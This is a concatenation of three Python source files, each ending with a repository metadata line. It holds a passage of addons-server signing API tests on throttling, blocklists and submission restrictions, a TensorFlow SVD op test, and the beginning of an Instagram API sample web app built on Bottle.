'REMOTE_ADDR': get_random_ip(),
'HTTP_X_FORWARDED_FOR': f'{get_random_ip()}, {get_random_ip()}',
},
)
assert response.status_code == 429
# 'Burst' throttling is 1 minute, so 61 seconds later we should be
# allowed again.
frozen_time.tick(delta=timedelta(seconds=61))
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': get_random_ip(),
'HTTP_X_FORWARDED_FOR': f'{get_random_ip()}, {get_random_ip()}',
},
)
assert response.status_code == expected_status
def _test_throttling_verb_user_hourly(self, verb, url, expected_status=201):
with freeze_time('2019-04-08 15:16:23.42') as frozen_time:
# 21 is above the hourly limit but below the daily one.
for x in range(0, 21):
# Make the IP different every time so that we test the user
# throttling.
self._add_fake_throttling_action(
view_class=self.view_class,
url=url,
user=self.user,
remote_addr=get_random_ip(),
)
# At this point we should be throttled since we're using the same
# user. (we're still inside the frozen time context).
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': get_random_ip(),
'HTTP_X_FORWARDED_FOR': f'{get_random_ip()}, {get_random_ip()}',
},
)
assert response.status_code == 429
# One minute later, past the 'burst' throttling period, we're still
# blocked by the 'hourly' limit.
frozen_time.tick(delta=timedelta(seconds=61))
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': get_random_ip(),
'HTTP_X_FORWARDED_FOR': f'{get_random_ip()}, {get_random_ip()}',
},
)
assert response.status_code == 429
# 3601 seconds later we should be allowed again.
frozen_time.tick(delta=timedelta(seconds=3601))
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': get_random_ip(),
'HTTP_X_FORWARDED_FOR': f'{get_random_ip()}, {get_random_ip()}',
},
)
assert response.status_code == expected_status
def _test_throttling_verb_user_daily(self, verb, url, expected_status=201):
with freeze_time('2019-04-08 15:16:23.42') as frozen_time:
for x in range(0, 50):
# Make the IP different every time so that we test the user
# throttling.
self._add_fake_throttling_action(
view_class=self.view_class,
url=url,
user=self.user,
remote_addr=get_random_ip(),
)
# At this point we should be throttled since we're using the same
# user. (we're still inside the frozen time context).
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': get_random_ip(),
'HTTP_X_FORWARDED_FOR': f'{get_random_ip()}, {get_random_ip()}',
},
)
assert response.status_code == 429
# One minute later, past the 'burst' throttling period, we're still
# blocked by the 'hourly' limit.
frozen_time.tick(delta=timedelta(seconds=61))
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': get_random_ip(),
'HTTP_X_FORWARDED_FOR': f'{get_random_ip()}, {get_random_ip()}',
},
)
assert response.status_code == 429
# After the hourly limit, still blocked.
frozen_time.tick(delta=timedelta(seconds=3601))
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': get_random_ip(),
'HTTP_X_FORWARDED_FOR': f'{get_random_ip()}, {get_random_ip()}',
},
)
assert response.status_code == 429
# 86401 seconds later we should be allowed again (24h + 1s).
frozen_time.tick(delta=timedelta(seconds=86401))
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': get_random_ip(),
'HTTP_X_FORWARDED_FOR': f'{get_random_ip()}, {get_random_ip()}',
},
)
assert response.status_code == expected_status
def test_throttling_post_ip_burst(self):
url = reverse_ns('signing.version')
self._test_throttling_verb_ip_burst('POST', url)
def test_throttling_post_ip_hourly(self):
url = reverse_ns('signing.version')
self._test_throttling_verb_ip_hourly('POST', url)
def test_throttling_post_user_burst(self):
url = reverse_ns('signing.version')
self._test_throttling_verb_user_burst('POST', url)
def test_throttling_post_user_hourly(self):
url = reverse_ns('signing.version')
self._test_throttling_verb_user_hourly('POST', url)
def test_throttling_post_user_daily(self):
url = reverse_ns('signing.version')
self._test_throttling_verb_user_daily('POST', url)
def test_throttling_put_ip_burst(self):
url = self.url(self.guid, '1.0')
self._test_throttling_verb_ip_burst('PUT', url, expected_status=202)
def test_throttling_put_ip_hourly(self):
url = self.url(self.guid, '1.0')
self._test_throttling_verb_ip_hourly('PUT', url, expected_status=202)
def test_throttling_put_user_burst(self):
url = self.url(self.guid, '1.0')
self._test_throttling_verb_user_burst('PUT', url, expected_status=202)
def test_throttling_put_user_hourly(self):
url = self.url(self.guid, '1.0')
self._test_throttling_verb_user_hourly('PUT', url, expected_status=202)
def test_throttling_put_user_daily(self):
url = self.url(self.guid, '1.0')
self._test_throttling_verb_user_daily('PUT', url, expected_status=202)
def test_throttling_ignored_for_special_users(self):
self.grant_permission(self.user, ':'.join(amo.permissions.LANGPACK_SUBMIT))
url = self.url(self.guid, '1.0')
with freeze_time('2019-04-08 15:16:23.42'):
for x in range(0, 60):
# With that many actions all throttling classes should prevent
# the user from submitting an addon...
self._add_fake_throttling_action(
view_class=self.view_class,
url=url,
user=self.user,
remote_addr='1.2.3.4',
)
# ... But it works, because it's a special user allowed to bypass
# throttling.
response = self.request(
'PUT',
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': '1.2.3.4',
'HTTP_X_FORWARDED_FOR': f'1.2.3.4, {get_random_ip()}',
},
)
assert response.status_code == 202
def test_version_blocked(self):
block = Block.objects.create(
guid=self.guid, max_version='3.0', updated_by=user_factory()
)
response = self.request('PUT', self.url(self.guid, '3.0'))
assert response.status_code == 400
block_url = absolutify(reverse('blocklist.block', args=(self.guid,)))
assert response.data['error'] == (
f'Version 3.0 matches {block_url} for this add-on. '
'You can contact [email protected] for additional '
'information.'
)
# it's okay if it's outside of the blocked range though
block.update(max_version='2.9')
response = self.request('PUT', self.url(self.guid, '3.0'))
assert response.status_code == 202
def test_addon_blocked(self):
guid = '@create-webextension'
block = Block.objects.create(
guid=guid, max_version='3.0', updated_by=user_factory()
)
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
# Testing when a new addon guid is specified in the url
response = self.request('PUT', guid=guid, version='1.0')
assert response.status_code == 400
block_url = absolutify(reverse('blocklist.block', args=(guid,)))
error_msg = (
f'Version 1.0 matches {block_url} for this add-on. '
'You can contact [email protected] for additional '
'information.'
)
assert response.data['error'] == error_msg
assert not qs.exists()
# it's okay if it's outside of the blocked range though
block.update(min_version='2.0')
response = self.request('PUT', guid=guid, version='1.0')
assert response.status_code == 201
def test_addon_blocked_guid_in_xpi(self):
guid = '@webextension-with-guid'
block = Block.objects.create(
guid=guid, max_version='3.0', updated_by=user_factory()
)
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
filename = self.xpi_filepath('@create-webextension-with-guid', '1.0')
url = reverse_ns('signing.version')
response = self.request(
'POST', guid=guid, version='1.0', filename=filename, url=url
)
assert response.status_code == 400
block_url = absolutify(reverse('blocklist.block', args=(guid,)))
error_msg = (
f'Version 1.0 matches {block_url} for this add-on. '
'You can contact [email protected] for additional '
'information.'
)
assert response.data['error'] == error_msg
assert not qs.exists()
# it's okay if it's outside of the blocked range though
block.update(min_version='2.0')
response = self.request(
'POST', guid=guid, version='1.0', filename=filename, url=url
)
assert response.status_code == 201
class TestUploadVersionWebextension(BaseUploadVersionTestMixin, TestCase):
def test_addon_does_not_exist_webextension(self):
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@create-webextension',
version='1.0',
extra_kwargs={'REMOTE_ADDR': '127.0.3.1'},
)
assert response.status_code == 201
guid = response.data['guid']
addon = Addon.unfiltered.get(guid=guid)
assert addon.guid is not None
assert addon.guid != self.guid
upload = FileUpload.objects.latest('pk')
assert upload.version == '1.0'
assert upload.user == self.user
assert upload.source == amo.UPLOAD_SOURCE_SIGNING_API
assert upload.ip_address == '127.0.3.1'
assert addon.has_author(self.user)
assert addon.status == amo.STATUS_NULL
latest_version = addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
assert latest_version
assert latest_version.channel == amo.RELEASE_CHANNEL_UNLISTED
def test_post_addon_restricted(self):
Addon.objects.all().get().delete()
assert Addon.objects.count() == 0
EmailUserRestriction.objects.create(email_pattern=self.user.email)
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@create-webextension',
version='1.0',
)
assert response.status_code == 403
assert json.loads(response.content.decode('utf-8')) == {
'detail': 'The email address used for your account is not '
'allowed for add-on submission.'
}
EmailUserRestriction.objects.all().delete()
IPNetworkUserRestriction.objects.create(network='127.0.0.1/32')
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@create-webextension',
version='1.0',
)
assert response.status_code == 403
assert json.loads(response.content.decode('utf-8')) == {
'detail': 'Multiple add-ons violating our policies have been '
'submitted from your location. The IP address has been '
'blocked.'
}
assert Addon.objects.count() == 0
@override_settings(
REPUTATION_SERVICE_URL='https://reputation.example.com',
REPUTATION_SERVICE_TOKEN='atoken',
)
def test_post_addon_restricted_by_reputation_ip(self):
Addon.objects.all().get().delete()
assert Addon.objects.count() == 0
responses.add(
responses.GET,
'https://reputation.example.com/type/ip/127.0.0.1',
content_type='application/json',
json={'reputation': 45},
)
responses.add(
responses.GET,
'https://reputation.example.com/type/email/%s' % self.user.email,
content_type='application/json',
status=404,
)
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@create-webextension',
version='1.0',
)
assert response.status_code == 403
assert json.loads(response.content.decode('utf-8')) == {
'detail': 'Multiple add-ons violating our policies have been '
'submitted from your location. The IP address has been '
'blocked.'
}
assert len(responses.calls) == 2
assert Addon.objects.count() == 0
@override_settings(
REPUTATION_SERVICE_URL='https://reputation.example.com',
REPUTATION_SERVICE_TOKEN='some_token',
)
def test_post_addon_restricted_by_reputation_email(self):
Addon.objects.all().get().delete()
assert Addon.objects.count() == 0
responses.add(
responses.GET,
'https://reputation.example.com/type/ip/127.0.0.1',
content_type='application/json',
status=404,
)
responses.add(
responses.GET,
'https://reputation.example.com/type/email/%s' % self.user.email,
content_type='application/json',
json={'reputation': 45},
)
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@create-webextension',
version='1.0',
)
assert response.status_code == 403
assert json.loads(response.content.decode('utf-8')) == {
'detail': 'The email address used for your account is not '
'allowed for add-on submission.'
}
assert len(responses.calls) == 2
assert Addon.objects.count() == 0
def test_addon_does_not_exist_webextension_with_guid_in_url(self):
guid = '@custom-guid-provided'
# Override the filename self.request() picks, we want that specific
# file but with a custom guid.
filename = self.xpi_filepath('@create-webextension', '1.0')
response = self.request(
'PUT', # PUT, not POST, since we're specifying a guid in the URL.
filename=filename,
guid=guid, # Will end up in the url since we're not passing one.
version='1.0',
)
assert response.status_code == 201
assert response.data['guid'] == '@custom-guid-provided'
addon = Addon.unfiltered.get(guid=response.data['guid'])
assert addon.guid == '@custom-guid-provided'
assert addon.has_author(self.user)
assert addon.status == amo.STATUS_NULL
latest_version = addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
assert latest_version
assert latest_version.channel == amo.RELEASE_CHANNEL_UNLISTED
def test_addon_does_not_exist_webextension_with_invalid_guid_in_url(self):
guid = 'custom-invalid-guid-provided'
# Override the filename self.request() picks, we want that specific
# file but with a custom guid.
filename = self.xpi_filepath('@create-webextension', '1.0')
response = self.request(
'PUT', # PUT, not POST, since we're specifying a guid in the URL.
filename=filename,
guid=guid, # Will end up in the url since we're not passing one.
version='1.0',
)
assert response.status_code == 400
assert response.data['error'] == 'Invalid Add-on ID in URL or package'
assert not Addon.unfiltered.filter(guid=guid).exists()
def test_webextension_reuse_guid(self):
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@create-webextension-with-guid',
version='1.0',
)
guid = response.data['guid']
assert guid == '@webextension-with-guid'
addon = Addon.unfiltered.get(guid=guid)
assert addon.guid == '@webextension-with-guid'
def test_webextension_reuse_guid_but_only_create(self):
# Uploading the same version with the same id fails. People
# have to use the regular `PUT` endpoint for that.
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@create-webextension-with-guid',
version='1.0',
)
assert response.status_code == 201
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@create-webextension-with-guid',
version='1.0',
)
assert response.status_code == 400
assert response.data['error'] == 'Duplicate add-on ID found.'
def test_webextension_optional_version(self):
# Uploading the same version with the same id fails. People
# have to use the regular `PUT` endpoint for that.
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@create-webextension-with-guid-and-version',
version='99.0',
)
assert response.status_code == 201
assert response.data['guid'] == '@create-webextension-with-guid-and-version'
assert response.data['version'] == '99.0'
def test_webextension_resolve_translations(self):
fname = 'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi'
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@notify-link-clicks-i18n',
version='1.0',
filename=fname,
)
assert response.status_code == 201
addon = Addon.unfiltered.get(guid=response.data['guid'])
# Normalized from `en` to `en-US`
assert addon.default_locale == 'en-US'
assert addon.name == 'Notify link clicks i18n'
assert addon.summary == ('Shows a notification when the user clicks on links.')
translation.activate('de')
addon.reload()
assert addon.name == 'Meine Beispielerweiterung'
assert addon.summary == 'Benachrichtigt den Benutzer über Linkklicks'
def test_too_long_guid_not_in_manifest_forbidden(self):
fname = 'src/olympia/files/fixtures/files/webextension_no_id.xpi'
guid = (
'this_guid_is_longer_than_the_limit_of_64_chars_see_bug_1201176_'
'and_should_fail@webextension-guid'
)
response = self.request(
'PUT', url=self.url(guid, '1.0'), version='1.0', filename=fname
)
assert response.status_code == 400
assert response.data == {
'error': (
"Please specify your Add-on ID in the manifest if it's "
'longer than 64 characters.'
)
}
assert not Addon.unfiltered.filter(guid=guid).exists()
def test_too_long_guid_in_manifest_allowed(self):
fname = 'src/olympia/files/fixtures/files/webextension_too_long_guid.xpi'
guid = (
'this_guid_is_longer_than_the_limit_of_64_chars_see_bug_1201176_'
'and_should_fail@webextension-guid'
)
response = self.request(
'PUT', url=self.url(guid, '1.0'), version='1.0', filename=fname
)
assert response.status_code == 201
assert Addon.unfiltered.filter(guid=guid).exists()
class TestTestUploadVersionWebextensionTransactions(
BaseUploadVersionTestMixin, TestCase, TransactionTestCase
):
# Tests to make sure transactions don't prevent
# ActivityLog/UserRestrictionHistory objects to be saved.
def test_activity_log_saved_on_throttling(self):
url = reverse_ns('signing.version')
with freeze_time('2019-04-08 15:16:23.42'):
for x in range(0, 3):
self._add_fake_throttling_action(
view_class=self.view_class,
url=url,
user=self.user,
remote_addr='1.2.3.4',
)
# At this point we should be throttled since we're using the same
# user. (we're still inside the frozen time context).
response = self.request(
'POST',
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': '1.2.3.4',
'HTTP_X_FORWARDED_FOR': f'1.2.3.4, {get_random_ip()}',
},
)
assert response.status_code == 429, response.content
# We should have recorded an ActivityLog.
assert (
ActivityLog.objects.for_user(self.user)
.filter(action=amo.LOG.THROTTLED.id)
.exists()
)
def test_user_restriction_history_saved_on_permission_denied(self):
EmailUserRestriction.objects.create(email_pattern=self.user.email)
url = reverse_ns('signing.version')
response = self.request(
'POST',
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': '1.2.3.4',
'HTTP_X_FORWARDED_FOR': f'1.2.3.4, {get_random_ip()}',
},
)
assert response.status_code == 403, response.content
assert UserRestrictionHistory.objects.filter(user=self.user).exists()
restriction = UserRestrictionHistory.objects.get(user=self.user)
assert restriction.ip_address == '1.2.3.4'
assert restriction.last_login_ip == '1.2.3.4'
assert restriction.get_restriction_display() == 'EmailUserRestriction'
class TestCheckVersion(BaseUploadVersionTestMixin, TestCase):
def test_not_authenticated(self):
# Use self.client.get so that we don't add the authorization header.
response = self.client.get(self.url(self.guid, '12.5'))
assert response.status_code == 401
def test_addon_does_not_exist(self):
response = self.get(self.url('foo', '12.5'))
assert response.status_code == 404
assert response.data['error'] == ('Could not find Add-on with ID "foo".')
def test_user_does_not_own_addon(self):
self.create_version('3.0')
self.user = UserProfile.objects.create(
read_dev_agreement=datetime.now(), email='[email protected]'
)
self.api_key = self.create_api_key(self.user, 'bar')
response = self.get(self.url(self.guid, '3.0'))
assert response.status_code == 403
assert response.data['error'] == 'You do not own this addon.'
def test_admin_can_view(self):
self.create_version('3.0')
self.user = UserProfile.objects.create(
read_dev_agreement=datetime.now(), email='[email protected]'
)
self.make_admin(self.user)
self.api_key = self.create_api_key(self.user, 'bar')
response = self.get(self.url(self.guid, '3.0'))
assert response.status_code == 200
assert 'processed' in response.data
def test_version_does_not_exist(self):
response = self.get(self.url(self.guid, '2.5'))
assert response.status_code == 404
assert response.data['error'] == 'No uploaded file for that addon and version.'
def test_version_exists(self):
self.create_version('3.0')
response = self.get(self.url(self.guid, '3.0'))
assert response.status_code == 200
assert 'processed' in response.data
def test_version_exists_with_pk(self):
# Mock Version.from_upload so the Version won't be created.
with mock.patch('olympia.devhub.utils.Version.from_upload'):
self.create_version('3.0')
upload = FileUpload.objects.latest()
upload.update(created=datetime.today() - timedelta(hours=1))
self.create_version('3.0')
newer_upload = FileUpload.objects.latest()
assert newer_upload != upload
response = self.get(self.url(self.guid, '3.0', upload.uuid.hex))
assert response.status_code == 200
# For backwards-compatibility reasons, we return the uuid as "pk".
assert response.data['pk'] == upload.uuid.hex
assert 'processed' in response.data
def test_version_exists_with_pk_not_owner(self):
orig_user, orig_api_key = self.user, self.api_key
# This will create a version for the add-on with guid @create-version
# using a new user.
self.user = UserProfile.objects.create(
read_dev_agreement=datetime.now(), email='[email protected]'
)
self.api_key = self.create_api_key(self.user, 'bar')
response = self.request('PUT', guid='@create-version', version='1.0')
assert response.status_code == 201
upload = FileUpload.objects.latest()
# Check that the user that created the upload can access it properly.
response = self.get(self.url('@create-version', '1.0', upload.uuid.hex))
assert response.status_code == 200
assert 'processed' in response.data
# This will create a version for the add-on from the fixture with the
# regular fixture user.
self.user, self.api_key = orig_user, orig_api_key
self.create_version('3.0')
# Check that we can't access the FileUpload by uuid even if we pass in
# an add-on and version that we own if we don't own the FileUpload.
response = self.get(self.url(self.guid, '3.0', upload.uuid.hex))
assert response.status_code == 404
assert 'error' in response.data
def test_version_download_url(self):
version_string = '3.0'
qs = File.objects.filter(
version__addon__guid=self.guid, version__version=version_string
)
assert not qs.exists()
self.create_version(version_string)
response = self.get(self.url(self.guid, version_string))
assert response.status_code == 200
file_ = qs.get()
assert response.data['files'][0]['download_url'] == absolutify(
reverse_ns('signing.file', kwargs={'file_id': file_.id})
+ f'/{file_.filename}'
)
def test_file_hash(self):
version_string = '3.0'
qs = File.objects.filter(
version__addon__guid=self.guid, version__version=version_string
)
assert not qs.exists()
self.create_version(version_string)
response = self.get(self.url(self.guid, version_string))
assert response.status_code == 200
file_ = qs.get()
# We're repackaging, so we can't compare the hash to an existing value.
expected_hash = file_.generate_hash(filename=file_.file_path)
assert file_.hash == expected_hash
assert response.data['files'][0]['hash'] == expected_hash
def test_has_failed_upload(self):
addon = Addon.objects.get(guid=self.guid)
FileUpload.objects.create(
addon=addon,
version='3.0',
user=self.user,
source=amo.UPLOAD_SOURCE_SIGNING_API,
ip_address='127.0.0.70',
)
self.create_version('3.0')
response = self.get(self.url(self.guid, '3.0'))
assert response.status_code == 200
assert 'processed' in response.data
def test_not_throttling_get(self):
self.create_version('3.0')
url = self.url(self.guid, '3.0')
with freeze_time('2019-04-08 15:16:23.42'):
for x in range(0, 60):
# With that many actions all throttling classes should prevent
# the user from submitting an addon...
self._add_fake_throttling_action(
view_class=self.view_class,
url=self.url(self.guid, '3.0'),
user=self.user,
remote_addr='1.2.3.4',
)
# ... But it works, because it's just a GET, not a POST/PUT upload.
response = self.get(
url,
client_kwargs={
'REMOTE_ADDR': '1.2.3.4',
'HTTP_X_FORWARDED_FOR': f'1.2.3.4, {get_random_ip()}',
},
)
assert response.status_code == 200
class TestSignedFile(SigningAPITestMixin, TestCase):
def setUp(self):
super().setUp()
self.file_ = self.create_file()
def url(self):
return reverse_ns('signing.file', args=[self.file_.pk])
def create_file(self):
addon = addon_factory(
name='thing',
version_kw={'channel': amo.RELEASE_CHANNEL_UNLISTED},
users=[self.user],
)
return addon.latest_unlisted_version.file
def test_can_download_once_authenticated(self):
response = self.get(self.url())
assert response.status_code == 200
assert response[settings.XSENDFILE_HEADER] == (self.file_.file_path)
def test_cannot_download_without_authentication(self):
response = self.client.get(self.url()) # no auth
assert response.status_code == 401
def test_api_relies_on_version_downloader(self):
with mock.patch('olympia.versions.views.download_file') as df:
df.return_value = Response({})
self.get(self.url())
assert df.called is True
assert df.call_args[0][0].user == self.user
assert df.call_args[0][1] == str(self.file_.pk)
| wagnerand/addons-server | src/olympia/signing/tests/test_views.py | Python | bsd-3-clause | 58,360 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.math_ops.matrix_inverse."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
class SvdOpTest(tf.test.TestCase):
def testWrongDimensions(self):
# The input to batch_svd should be a tensor of at least rank 2.
scalar = tf.constant(1.)
with self.assertRaisesRegexp(ValueError,
"Shape must be at least rank 2 but is rank 0"):
tf.svd(scalar)
vector = tf.constant([1., 2.])
with self.assertRaisesRegexp(ValueError,
"Shape must be at least rank 2 but is rank 1"):
tf.svd(vector)
def _GetSvdOpTest(dtype_, shape_):
is_complex = dtype_ in (np.complex64, np.complex128)
is_single = dtype_ in (np.float32, np.complex64)
def CompareSingularValues(self, x, y):
if is_single:
tol = 5e-5
else:
tol = 1e-14
self.assertAllClose(x, y, atol=(x[0] + y[0]) * tol)
def CompareSingularVectors(self, x, y, rank):
if is_single:
atol = 5e-4
else:
atol = 5e-14
# We only compare the first 'rank' singular vectors since the
# remainder form an arbitrary orthonormal basis for the
# (row- or column-) null space, whose exact value depends on
# implementation details. Notice that since we check that the
# matrices of singular vectors are unitary elsewhere, we do
# implicitly test that the trailing vectors of x and y span the
# same space.
x = x[..., 0:rank]
y = y[..., 0:rank]
# Singular vectors are only unique up to sign (complex phase factor for
# complex matrices), so we normalize the sign first.
sum_of_ratios = np.sum(np.divide(y, x), -2, keepdims=True)
phases = np.divide(sum_of_ratios, np.abs(sum_of_ratios))
x *= phases
self.assertAllClose(x, y, atol=atol)
def CheckApproximation(self, a, u, s, v, full_matrices):
if is_single:
tol = 1e-5
else:
tol = 1e-14
# Tests that a ~= u*diag(s)*transpose(v).
batch_shape = a.shape[:-2]
m = a.shape[-2]
n = a.shape[-1]
diag_s = tf.cast(tf.matrix_diag(s), dtype=dtype_)
if full_matrices:
if m > n:
zeros = tf.zeros(batch_shape + (m - n, n), dtype=dtype_)
diag_s = tf.concat(a.ndim - 2, [diag_s, zeros])
elif n > m:
zeros = tf.zeros(batch_shape + (m, n - m), dtype=dtype_)
diag_s = tf.concat(a.ndim - 1, [diag_s, zeros])
a_recon = tf.batch_matmul(u, diag_s)
a_recon = tf.batch_matmul(a_recon, v, adj_y=True)
self.assertAllClose(a_recon.eval(), a, rtol=tol, atol=tol)
def CheckUnitary(self, x):
# Tests that x[...,:,:]^H * x[...,:,:] is close to the identity.
xx = tf.batch_matmul(x, x, adj_x=True)
identity = tf.matrix_band_part(tf.ones_like(xx), 0, 0)
if is_single:
tol = 1e-5
else:
tol = 1e-14
self.assertAllClose(identity.eval(), xx.eval(), atol=tol)
def Test(self):
np.random.seed(1)
x = np.random.uniform(
low=-1.0, high=1.0, size=np.prod(shape_)).reshape(shape_).astype(dtype_)
if is_complex:
x += 1j * np.random.uniform(
low=-1.0, high=1.0,
size=np.prod(shape_)).reshape(shape_).astype(dtype_)
for compute_uv in False, True:
for full_matrices in False, True:
with self.test_session():
if compute_uv:
tf_s, tf_u, tf_v = tf.svd(tf.constant(x),
compute_uv=compute_uv,
full_matrices=full_matrices)
else:
tf_s = tf.svd(tf.constant(x),
compute_uv=compute_uv,
full_matrices=full_matrices)
if compute_uv:
np_u, np_s, np_v = np.linalg.svd(x,
compute_uv=compute_uv,
full_matrices=full_matrices)
else:
np_s = np.linalg.svd(x,
compute_uv=compute_uv,
full_matrices=full_matrices)
CompareSingularValues(self, np_s, tf_s.eval())
if compute_uv:
CompareSingularVectors(self, np_u, tf_u.eval(), min(shape_[-2:]))
CompareSingularVectors(self, np.conj(np.swapaxes(np_v, -2, -1)),
tf_v.eval(), min(shape_[-2:]))
CheckApproximation(self, x, tf_u, tf_s, tf_v, full_matrices)
CheckUnitary(self, tf_u)
CheckUnitary(self, tf_v)
return Test
if __name__ == "__main__":
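  # Dynamically attach one test method per (dtype, shape) combination to
  # SvdOpTest before running them all.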
for dtype in np.float32, np.float64, np.complex64, np.complex128:
for rows in 1, 2, 5, 10, 32, 100:
for cols in 1, 2, 5, 10, 32, 100:
for batch_dims in [(), (3,)] + [(3, 2)] * (max(rows, cols) < 10):
shape = batch_dims + (rows, cols)
name = "%s_%s" % (dtype.__name__, "_".join(map(str, shape)))
setattr(SvdOpTest, "testSvd_" + name, _GetSvdOpTest(dtype, shape))
tf.test.main()
| nanditav/15712-TensorFlow | tensorflow/python/kernel_tests/svd_op_test.py | Python | apache-2.0 | 5,740 |
import bottle
import beaker.middleware
from bottle import route, redirect, post, run, request, hook
from instagram import client, subscriptions
bottle.debug(True)
session_opts = {
'session.type': 'file',
'session.data_dir': './session/',
'session.auto': True,
}
app = beaker.middleware.SessionMiddleware(bottle.app(), session_opts)
CONFIG = {
'client_id': '<client_id>',
'client_secret': '<client_secret>',
'redirect_uri': 'http://localhost:8515/oauth_callback'
}
unauthenticated_api = client.InstagramAPI(**CONFIG)
@hook('before_request')
def setup_request():
request.session = request.environ['beaker.session']
def process_tag_update(update):
print(update)
reactor = subscriptions.SubscriptionsReactor()
reactor.register_callback(subscriptions.SubscriptionType.TAG, process_tag_update)
@route('/')
def home():
try:
url = unauthenticated_api.get_authorize_url(scope=["likes","comments"])
return '<a href="%s">Connect with Instagram</a>' % url
except Exception as e:
print(e)
def get_nav():
nav_menu = ("<h1>Python Instagram</h1>"
"<ul>"
"<li><a href='/recent'>User Recent Media</a> Calls user_recent_media - Get a list of a user's most recent media</li>"
"<li><a href='/user_media_feed'>User Media Feed</a> Calls user_media_feed - Get the currently authenticated user's media feed uses pagination</li>"
"<li><a href='/location_recent_media'>Location Recent Media</a> Calls location_recent_media - Get a list of recent media at a given location, in this case, the Instagram office</li>"
"<li><a href='/media_search'>Media Search</a> Calls media_search - Get a list of media close to a given latitude and longitude</li>"
"<li><a href='/media_popular'>Popular Media</a> Calls media_popular - Get a list of the overall most popular media items</li>"
"<li><a href='/user_search'>User Search</a> Calls user_search - Search for users on instagram, by name or username</li>"
"<li><a href='/user_follows'>User Follows</a> Get the followers of @instagram uses pagination</li>"
"<li><a href='/location_search'>Location Search</a> Calls location_search - Search for a location by lat/lng</li>"
"<li><a href='/tag_search'>Tags</a> Search for tags, view tag info and get media by tag</li>"
"</ul>")
return nav_menu
@route('/oauth_callback')
def on_callback():
code = request.GET.get("code")
if not code:
return 'Missing code'
try:
access_token, user_info = unauthenticated_api.exchange_code_for_access_token(code)
if not access_token:
return 'Could not get access token'
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
request.session['access_token'] = access_token
except Exception as e:
print(e)
return get_nav()
@route('/recent')
def on_recent():
content = "<h2>User Recent Media</h2>"
access_token = request.session['access_token']
if not access_token:
return 'Missing Access Token'
try:
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
recent_media, next = api.user_recent_media()
photos = []
for media in recent_media:
photos.append('<div style="float:left;">')
if(media.type == 'video'):
                photos.append('<video controls height="150"><source type="video/mp4" src="%s"/></video>' % (media.get_standard_resolution_url()))
else:
photos.append('<img src="%s"/>' % (media.get_low_resolution_url()))
photos.append("<br/> <a href='/media_like/%s'>Like</a> <a href='/media_unlike/%s'>Un-Like</a> LikesCount=%s</div>" % (media.id,media.id,media.like_count))
content += ''.join(photos)
except Exception as e:
print(e)
return "%s %s <br/>Remaining API Calls = %s/%s" % (get_nav(),content,api.x_ratelimit_remaining,api.x_ratelimit)
@route('/media_like/<id>')
def media_like(id):
access_token = request.session['access_token']
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
api.like_media(media_id=id)
redirect("/recent")
@route('/media_unlike/<id>')
def media_unlike(id):
access_token = request.session['access_token']
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
api.unlike_media(media_id=id)
redirect("/recent")
@route('/user_media_feed')
def on_user_media_feed():
access_token = request.session['access_token']
content = "<h2>User Media Feed</h2>"
if not access_token:
return 'Missing Access Token'
try:
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
media_feed, next = api.user_media_feed()
photos = []
for media in media_feed:
photos.append('<img src="%s"/>' % media.get_standard_resolution_url())
counter = 1
while next and counter < 3:
media_feed, next = api.user_media_feed(with_next_url=next)
for media in media_feed:
photos.append('<img src="%s"/>' % media.get_standard_resolution_url())
counter += 1
content += ''.join(photos)
except Exception as e:
print(e)
return "%s %s <br/>Remaining API Calls = %s/%s" % (get_nav(),content,api.x_ratelimit_remaining,api.x_ratelimit)
@route('/location_recent_media')
def location_recent_media():
access_token = request.session['access_token']
content = "<h2>Location Recent Media</h2>"
if not access_token:
return 'Missing Access Token'
try:
